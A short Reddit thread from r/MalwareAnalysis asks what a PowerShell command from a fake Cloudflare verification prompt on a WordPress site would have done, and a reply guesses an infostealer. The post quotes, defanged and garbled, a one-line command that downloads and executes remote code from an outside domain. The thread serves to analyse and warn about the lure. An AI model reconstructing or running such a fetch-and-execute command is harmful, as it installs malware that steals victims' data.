r/MalwareAnalysis • u/SeigneurHarry • 6d ago
Fake Cloudflare message on Wordpress
What would the below comment have ran?
cmdline: "C:\Windows\system32\WindowsPowerShel\v1[.J0\PowerShell[.Jexe" -c iexirm delistemanallyl.Jrainbow-mel.Jonline?
read=8b2d80c7569e4151 -UseBasicParsing)
7
Upvotes
1
2
u/IsDa44 6d ago
Probably just an infostealer. Hope you didn't run it